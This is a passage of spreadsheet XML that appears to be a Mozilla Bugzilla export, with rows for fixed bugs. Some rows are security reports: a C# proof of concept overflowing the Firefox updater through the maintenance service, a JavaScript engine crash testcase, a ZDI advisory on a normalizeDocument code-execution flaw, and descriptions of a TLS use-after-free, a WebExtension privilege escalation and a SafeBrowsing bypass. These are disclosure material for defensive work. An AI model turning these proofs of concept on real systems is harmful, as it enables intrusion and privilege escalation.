      <c r="M2008" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2008" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2008" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2008" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+]</t>
        </is>
      </c>
      <c r="Q2008" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2008" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2008" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T2008" t="n">
        <v>1</v>
      </c>
      <c r="U2008" t="n">
        <v>0</v>
      </c>
      <c r="V2008" t="n">
        <v>9</v>
      </c>
      <c r="W2008" t="inlineStr">
        <is>
          <t>Created attachment 768974
Proof of concept source + binary
Using specially crafted arguments, an attacker can cause a buffer overflow in the updater executable (http://hg.mozilla.org/mozilla-central/file/942686767e5e/toolkit/mozapps/update/updater/updater.cpp#l2940). The maintenance service passes all arguments provided to it along to the updater, so it can be used to trigger the overflow which can potentially lead to arbitrary code execution with SYSTEM privileges.
The vulnerability occurs when the /replace flag is given along with a long callback path. C# proof-of-concept:
using System;
using System.ServiceProcess;
namespace ReplaceBufferOverflow
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                ServiceController c = new ServiceController("MozillaMaintenance");
                c.Start(new string[] {  "aaa",
                                    "software-update",
                                    @"c:\program files (x86)\Mozilla Firefox\updater.exe",
                                    @"c:\program files (x86)\Mozilla Firefox",
                                    @"c:\Program Files (x86)\Mozilla Firefox\uninstall",
                                    @"/replace",
                                    @"CCCCC",
                                    (new String('A',999))
                                     });
            }
            catch (Exception e) {
                Console.WriteLine(e);
            }
        }
    }
}
I can replicate on Windows 7 x64 with updater.exe version 22.0.0.4917 and maintenanceservice.exe version 23.0.0.4921. The result is an entry in the Windows application event log that looks similar to this:
Event ID: 1000
Faulting application name: updater.exe, version: 22.0.0.4917, time stamp: 0x51c055c9
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00410041
Faulting process id: 0x408
Faulting application start time: 0x01ce741487153860
Faulting application path: C:\Program Files (x86)\Mozilla Maintenance Service\update\updater.exe
Faulting module path: unknown
...
I have attached a compiled version of the proof-of-concept code, let me know if you need any further details.</t>
        </is>
      </c>
      <c r="X2008" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2009">
      <c r="A2009" t="n">
        <v>797163</v>
      </c>
      <c r="B2009" t="inlineStr">
        <is>
          <t>2012-10-02 15:05:51 -0700</t>
        </is>
      </c>
      <c r="C2009" t="inlineStr">
        <is>
          <t>"Assertion failure: lifetime-&gt;entry == uint32_t(entryTarget - outerScript-&gt;code),"</t>
        </is>
      </c>
      <c r="D2009" t="inlineStr">
        <is>
          <t>2013-03-19 06:40:06 -0700</t>
        </is>
      </c>
      <c r="E2009" t="n">
        <v>1</v>
      </c>
      <c r="F2009" t="n">
        <v>1</v>
      </c>
      <c r="G2009" t="n">
        <v>3</v>
      </c>
      <c r="H2009" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2009" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2009" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2009" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2009" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2009" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2009" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2009" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2009" t="inlineStr">
        <is>
          <t>Fixed by patch in bug 781859 [jsbugmon:update,ignore][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q2009" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2009" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2009" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2009" t="n">
        <v>1</v>
      </c>
      <c r="U2009" t="n">
        <v>0</v>
      </c>
      <c r="V2009" t="n">
        <v>8</v>
      </c>
      <c r="W2009" t="inlineStr">
        <is>
          <t>Created attachment 667198
stack
function f() {
  switch (2) {
  default:
    y = newGlobal()
  }
  return function(code) {
    try {
      evalcx(code, y)
    } catch (e) {}
  }
}
function h(code) {
  g(code)
}
g = f()
mjitChunkLimit(1)
h("let x=s")
h("switch(x){\
  case 2:break;\
  b;\
  default:while(this){}\
}")
asserts js debug shell on m-c changeset 640a57ebab48 without any CLI arguments at Assertion failure: lifetime-&gt;entry == uint32_t(entryTarget - outerScript-&gt;code),
s-s because bug 781859 is s-s, also adapting flags from that bug.
This is likely fixed by the upcoming patch in bug 781859, filing to (hopefully) get this testcase in the tree.</t>
        </is>
      </c>
      <c r="X2009" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2010">
      <c r="A2010" t="n">
        <v>580445</v>
      </c>
      <c r="B2010" t="inlineStr">
        <is>
          <t>2010-07-20 16:50:01 -0700</t>
        </is>
      </c>
      <c r="C2010" t="inlineStr">
        <is>
          <t>normalizeDocument Remote Code Execution Vulnerability (ZDI-CAN-866)</t>
        </is>
      </c>
      <c r="D2010" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2010" t="n">
        <v>1</v>
      </c>
      <c r="F2010" t="n">
        <v>1</v>
      </c>
      <c r="G2010" t="n">
        <v>3</v>
      </c>
      <c r="H2010" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2010" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2010" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2010" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2010" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2010" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2010" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2010" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2010" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2010" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2010" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2010" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2010" t="n">
        <v>1</v>
      </c>
      <c r="U2010" t="n">
        <v>0</v>
      </c>
      <c r="V2010" t="n">
        <v>16</v>
      </c>
      <c r="W2010" t="inlineStr">
        <is>
          <t>Created attachment 458836
PoC
ZDI-CAN-866: Mozilla Firefox normalizeDocument Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)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flaw exists within the normalizeDocument function defined within
nsDocument.cpp. When handling children nodes the code does not account
for a varying number of children during normalization. An attacker can
abuse this problem along with the fact that the code does not validate
the child index is within bounds to access an invalid object and execute
arbitrary code under the context of the browser.
From content/base/src/nsDocument.cpp:
nsDocument::Normalize()
{
PRInt32 count = mChildren.ChildCount();
for (PRInt32 i = 0; i &lt; count; ++i) {
nsCOMPtr&lt;nsIDOMNode&gt; node(do_QueryInterface(mChildren.ChildAt(i)));
if (node) {
node-&gt;Normalize();
}
}
return NS_OK;
}
There are two problems in the code above:
1. Number of root's children can change during normalization. Thus
fetching
mChildren.ChildCount() at the very beginning is incorrect.
2. mChildren.ChildAt() is not a fail-safe method, i.e. it does not check
if index argument is within children array bounds.
Attacker can create HTML document with some additional nodes after HTML
body and then remove them during initial steps of normalization process.
This directly leads to arbitrary code execution.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2010" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2011">
      <c r="A2011" t="n">
        <v>1313211</v>
      </c>
      <c r="B2011" t="inlineStr">
        <is>
          <t>2016-10-26 14:55:53 -0700</t>
        </is>
      </c>
      <c r="C2011" t="inlineStr">
        <is>
          <t>Update data collection docs to reflect latest changes for Adjust</t>
        </is>
      </c>
      <c r="D2011" t="inlineStr">
        <is>
          <t>2016-11-17 05:55:04 -0800</t>
        </is>
      </c>
      <c r="E2011" t="n">
        <v>1</v>
      </c>
      <c r="F2011" t="n">
        <v>1</v>
      </c>
      <c r="G2011" t="n">
        <v>2</v>
      </c>
      <c r="H2011" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2011" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J2011" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2011" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="L2011" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2011" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2011" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2011" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2011" t="inlineStr"/>
      <c r="Q2011" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2011" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2011" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2011" t="n">
        <v>1</v>
      </c>
      <c r="U2011" t="n">
        <v>0</v>
      </c>
      <c r="V2011" t="n">
        <v>4</v>
      </c>
      <c r="W2011" t="inlineStr">
        <is>
          <t>Policy asks us to document our latest updates of the events we send to Adjust for Focus.
Could you please reflect these additions in the docs?
http://gecko.readthedocs.io/en/latest/mobile/android/fennec/adjust.html#what-data-is-collected-and-sent-to-the-adjust-backend</t>
        </is>
      </c>
      <c r="X2011" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2012">
      <c r="A2012" t="n">
        <v>1377618</v>
      </c>
      <c r="B2012" t="inlineStr">
        <is>
          <t>2017-06-30 18:03:15 -0700</t>
        </is>
      </c>
      <c r="C2012" t="inlineStr">
        <is>
          <t>Potential UAF in TLS 1.2 server when verifying client authentication</t>
        </is>
      </c>
      <c r="D2012" t="inlineStr">
        <is>
          <t>2018-02-01 17:25:15 -0800</t>
        </is>
      </c>
      <c r="E2012" t="n">
        <v>1</v>
      </c>
      <c r="F2012" t="n">
        <v>1</v>
      </c>
      <c r="G2012" t="n">
        <v>3</v>
      </c>
      <c r="H2012" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2012" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2012" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2012" t="inlineStr">
        <is>
          <t>3.25</t>
        </is>
      </c>
      <c r="L2012" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2012" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2012" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2012" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2012" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+][post-critsmash-triage] (can affect Firefox via WebRTC)</t>
        </is>
      </c>
      <c r="Q2012" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2012" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2012" t="inlineStr">
        <is>
          <t>3.32</t>
        </is>
      </c>
      <c r="T2012" t="n">
        <v>1</v>
      </c>
      <c r="U2012" t="n">
        <v>0</v>
      </c>
      <c r="V2012" t="n">
        <v>31</v>
      </c>
      <c r="W2012" t="inlineStr">
        <is>
          <t>Created attachment 8882762
use length only, not a pointer
This is a regression caused by Bug 1179338, but I only noticed it when I made some changes to the sslBuffer functions.
In TLS 1.2, handshake hashes are calculated at the time they are needed.  The handshake hashes are tweaked to include a pointer to the message buffer in the field pointer_to_hash_input:
https://searchfox.org/nss/rev/b5e2bb64574eefa20a9143d908bd4e09a125070e/lib/ssl/ssl3con.c#11668
This is necessary because the hashes need to cover the previous handshake message, but not the current message.  Later in the same function, the saved transcript is updated with the current message.  ssl3_UpdateHandshakeHashes() is called to add the current handshake message.  For TLS 1.2, this means appending those to ss-&gt;ssl3.hs.messages, which is an sslBuffer.
The problem is that if the handshake transcript exceeds the space available in the current buffer, a new buffer will be allocated.  This is fairly unlikely, because the buffer is initialized to (MAX_FRAGMENT_LENGTH + 2048), which is 18k.  However, if the handshake transcript up and including the client Certificate is almost 18k, then this reallocation will occur when handling the CertificateVerify as the total transcript goes over 18k.
The value of pointer_to_hash_input is left pointing at a freed buffer and you get a UAF when the handshake hashes (needed to verify the client's signature) are calculated.
I only noticed this because I changed sslBuffer_Grow to start at a lower initial value and it happened.
The fix here is pretty simple.  I've attached a patch.  I plan to land this as part of a bunch of other work, which should hide the change, however that is only on a branch currently and won't merge into NSS proper for some time.
Kai, do you think we need to land this in trunk or uplift it anywhere?</t>
        </is>
      </c>
      <c r="X2012" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2013">
      <c r="A2013" t="n">
        <v>1295324</v>
      </c>
      <c r="B2013" t="inlineStr">
        <is>
          <t>2016-08-15 15:08:01 -0700</t>
        </is>
      </c>
      <c r="C2013" t="inlineStr">
        <is>
          <t>WebExtensions can easily access the mozAddonManager API and use it to gain elevated privileges.</t>
        </is>
      </c>
      <c r="D2013" t="inlineStr">
        <is>
          <t>2018-06-19 13:04:58 -0700</t>
        </is>
      </c>
      <c r="E2013" t="n">
        <v>1</v>
      </c>
      <c r="F2013" t="n">
        <v>1</v>
      </c>
      <c r="G2013" t="n">
        <v>3</v>
      </c>
      <c r="H2013" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2013" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J2013" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K2013" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L2013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2013" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2013" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2013" t="inlineStr">
        <is>
          <t>[adv-main50+] triaged</t>
        </is>
      </c>
      <c r="Q2013" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2013" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2013" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T2013" t="n">
        <v>1</v>
      </c>
      <c r="U2013" t="n">
        <v>0</v>
      </c>
      <c r="V2013" t="n">
        <v>46</v>
      </c>
      <c r="W2013" t="inlineStr">
        <is>
          <t>See attached testcase. Simply install it (in Firefox 49 or later), and it immediately installs AdBlock Plus.
Given AMO's CSP, we could probably prevent this by a) preventing the object from being accessed via wrappers, and b) preventing extensions from meddling with CSP headers.
But the only real solution I see is to prevent WebExtensions from executing scripts on any site with these kinds of elevated privileges.</t>
        </is>
      </c>
      <c r="X2013" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2014">
      <c r="A2014" t="n">
        <v>1106303</v>
      </c>
      <c r="B2014" t="inlineStr">
        <is>
          <t>2014-11-29 11:40:46 -0800</t>
        </is>
      </c>
      <c r="C2014" t="inlineStr">
        <is>
          <t>Add missing divider between Help and User buttons</t>
        </is>
      </c>
      <c r="D2014" t="inlineStr">
        <is>
          <t>2015-05-20 04:29:54 -0700</t>
        </is>
      </c>
      <c r="E2014" t="n">
        <v>1</v>
      </c>
      <c r="F2014" t="n">
        <v>1</v>
      </c>
      <c r="G2014" t="n">
        <v>7</v>
      </c>
      <c r="H2014" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2014" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2014" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2014" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2014" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2014" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2014" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2014" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2014" t="inlineStr"/>
      <c r="Q2014" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R2014" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S2014" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2014" t="n">
        <v>1</v>
      </c>
      <c r="U2014" t="n">
        <v>0</v>
      </c>
      <c r="V2014" t="n">
        <v>7</v>
      </c>
      <c r="W2014" t="inlineStr">
        <is>
          <t>Nothing exciting, but I noticed in philor's screen grab for bug 1106145 a missing divider between the Help and User buttons, for users who are logged in to the platform.
Since I can't yet run a local vagrant, I wasn't able to see this during the navbar polish work in bug 1095211.
I'll see if I can add it in blind, and then hopefully test it on dev.</t>
        </is>
      </c>
      <c r="X2014" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2015">
      <c r="A2015" t="n">
        <v>78121</v>
      </c>
      <c r="B2015" t="inlineStr">
        <is>
          <t>2001-04-29 15:15:06 -0700</t>
        </is>
      </c>
      <c r="C2015" t="inlineStr">
        <is>
          <t>buy.com site crashes</t>
        </is>
      </c>
      <c r="D2015" t="inlineStr">
        <is>
          <t>2002-01-18 00:39:55 -0800</t>
        </is>
      </c>
      <c r="E2015" t="n">
        <v>1</v>
      </c>
      <c r="F2015" t="n">
        <v>1</v>
      </c>
      <c r="G2015" t="n">
        <v>3</v>
      </c>
      <c r="H2015" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2015" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2015" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2015" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2015" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2015" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2015" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2015" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2015" t="inlineStr"/>
      <c r="Q2015" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2015" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2015" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T2015" t="n">
        <v>1</v>
      </c>
      <c r="U2015" t="n">
        <v>0</v>
      </c>
      <c r="V2015" t="n">
        <v>42</v>
      </c>
      <c r="W2015" t="inlineStr">
        <is>
          <t>When I am surfing around buy.com I keep getting this crash.
Sorry if this is a dupe and I do not know where to file this so I am leaving
this unconfirmed.
This crasher happens in the past few days builds because I crashed so I got a
new build and it still crashes in the same DLL.
___________________
MOZILLA caused an invalid page fault in
module GKCONTENT.DLL at 017f:60235fc7.
Registers:
EAX=00000041 CS=017f EIP=60235fc7 EFLGS=00010206
EBX=00000000 SS=0187 ESP=0068f5f8 EBP=0068f628
ECX=01caa1e0 DS=0187 ESI=01d2af40 FS=19ff
EDX=0000000c ES=0187 EDI=01d7d13c GS=0000
Bytes at CS:EIP:
8b 08 33 d2 39 56 4c 0f 94 c2 52 50 ff 91 1c 01 
Stack dump:
01d7af40 01d2af40 00000001 0000044c 0178cd80 0068f644 60ea1237 0068f644 60e07bba
00000001 6012101a 01d7d06c 0068f644 60125386 01d85de0 00000000</t>
        </is>
      </c>
      <c r="X2015" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2016">
      <c r="A2016" t="n">
        <v>475441</v>
      </c>
      <c r="B2016" t="inlineStr">
        <is>
          <t>2009-01-26 15:59:02 -0800</t>
        </is>
      </c>
      <c r="C2016" t="inlineStr">
        <is>
          <t>Cache media data after playing it and across seeks</t>
        </is>
      </c>
      <c r="D2016" t="inlineStr">
        <is>
          <t>2013-12-10 09:58:48 -0800</t>
        </is>
      </c>
      <c r="E2016" t="n">
        <v>1</v>
      </c>
      <c r="F2016" t="n">
        <v>1</v>
      </c>
      <c r="G2016" t="n">
        <v>3</v>
      </c>
      <c r="H2016" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2016" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2016" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2016" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2016" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2016" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2016" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2016" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2016" t="inlineStr"/>
      <c r="Q2016" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2016" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2016" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2016" t="n">
        <v>1</v>
      </c>
      <c r="U2016" t="n">
        <v>1</v>
      </c>
      <c r="V2016" t="n">
        <v>70</v>
      </c>
      <c r="W2016" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090126 Minefield/3.2a1pre
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090126 Minefield/3.2a1pre
Presently video support discard all buffered data before the current play position. This is problematic causing many net requests for simple seeks (even within areas of the video that appear to already be buffered.) 
Reproducible: Always
Steps to Reproduce:
1.Play the video
2. Try to seek within buffered areas or before the current play head position
Actual Results:  
Notice the delay as the client goes to the web to seek since it threw away all your buffed data. 
Expected Results:  
We should not throw away buffered data seeking should be done from disk for parts of the clip that has been downloaded. 
This is especially bad in low bandwidth cases where you play back the video and then it pauses because it hits the end of the buffer. You then rewind the playhead to get smooth playback (like you would with any other video player on the web) Unfortunately the client throws away all your buffer info and the low quality playback experience is repeated.</t>
        </is>
      </c>
      <c r="X2016" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2017">
      <c r="A2017" t="n">
        <v>1483510</v>
      </c>
      <c r="B2017" t="inlineStr">
        <is>
          <t>2018-08-15 04:21:46 -0700</t>
        </is>
      </c>
      <c r="C2017" t="inlineStr">
        <is>
          <t>SafeBrowsing bypass by web socket</t>
        </is>
      </c>
      <c r="D2017" t="inlineStr">
        <is>
          <t>2024-05-30 09:47:47 -0700</t>
        </is>
      </c>
      <c r="E2017" t="n">
        <v>1</v>
      </c>
      <c r="F2017" t="n">
        <v>1</v>
      </c>
      <c r="G2017" t="n">
        <v>3</v>
      </c>
      <c r="H2017" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2017" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2017" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K2017" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2017" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2017" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2017" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2017" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2017" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main68+] tp-leak</t>
        </is>
      </c>
      <c r="Q2017" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2017" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2017" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T2017" t="n">
        <v>1</v>
      </c>
      <c r="U2017" t="n">
        <v>0</v>
      </c>
      <c r="V2017" t="n">
        <v>20</v>
      </c>
      <c r="W2017" t="inlineStr">
        <is>
          <t>Created attachment 9000245
test2.html
Steps to reproduce the problem:
1. Try to go to website, which is blocked by Safebrowsing API, for example: ri-online.su. Firefox will block navigate and show warning. Also, we'll see in console, that request was blocked by safebrowsing. 
2. If an attacker create malicious web site, which will load content from Safe Browsing blocked resource (script src, or xhr/fetch), such site also will blocked.
3.  If an attacker create malicious web site, which will load content from Safe Browsing blocked resource through websocket protocol no warning will be shown. Please, see test2.html for variant of the POC.
What is the expected behavior?
Firefox should show safe browsing warning before navigate to malicious web resource.
What went wrong?
Firefox does navigate to malicious resource through websocket without any warnings. 
So, this issue is a variation of the SafeBrowsing bypass, which allow to load and evaluate malicious scripts  from known  and blocked resources.</t>
        </is>
      </c>
      <c r="X2017" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2018">
      <c r="A2018" t="n">
        <v>585284</v>
      </c>
      <c r="B2018" t="inlineStr">
        <is>
          <t>2010-08-07 04:14:56 -0700</t>
        </is>
      </c>
      <c r="C2018" t="inlineStr">
        <is>
          <t>XSS using SJOW's scripted function</t>
        </is>
      </c>
      <c r="D2018" t="inlineStr">
        <is>
          <t>2011-10-26 13:37:06 -0700</t>
        </is>
      </c>
      <c r="E2018" t="n">
        <v>1</v>
      </c>
      <c r="F2018" t="n">
        <v>1</v>
      </c>
      <c r="G2018" t="n">
        <v>3</v>
      </c>
      <c r="H2018" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2018" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2018" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2018" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L2018" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2018" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2018" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2018" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2018" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q2018" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2018" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2018" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2018" t="n">
        <v>1</v>
      </c>
      <c r="U2018" t="n">
        <v>0</v>
      </c>
      <c r="V2018" t="n">
        <v>6</v>
      </c>
      <c r="W2018" t="inlineStr">
        <is>
          <t>1.9.1 branch has a similar problem to bug 584180.
On 1.9.1, SJOW creates a scripted function that can be abused.  If a scripted
function's parent is an outer window, an array that is created in that function
comes from a current inner window.</t>
        </is>
      </c>
      <c r="X2018" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2019">
      <c r="A2019" t="n">
        <v>311279</v>
      </c>
      <c r="B2019" t="inlineStr">
        <is>
          <t>2005-10-05 15:54:26 -0700</t>
        </is>
      </c>
      <c r="C2019" t="inlineStr">
        <is>
          <t>crmftest core dumps on HP-UX</t>
        </is>
      </c>
      <c r="D2019" t="inlineStr">
        <is>
          <t>2006-10-25 19:51:37 -0700</t>
        </is>
      </c>
      <c r="E2019" t="n">
        <v>1</v>
      </c>
      <c r="F2019" t="n">
        <v>1</v>
      </c>
      <c r="G2019" t="n">
        <v>3</v>
      </c>
      <c r="H2019" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2019" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2019" t="inlineStr">
        <is>
          <t>Test</t>
        </is>
      </c>
      <c r="K2019" t="inlineStr">
        <is>
          <t>3.11</t>
        </is>
      </c>
      <c r="L2019" t="inlineStr">
        <is>
          <t>HP</t>
        </is>
      </c>
      <c r="M2019" t="inlineStr">
        <is>
          <t>HP-UX</t>
        </is>
      </c>
      <c r="N2019" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2019" t="inlineStr">
        <is>
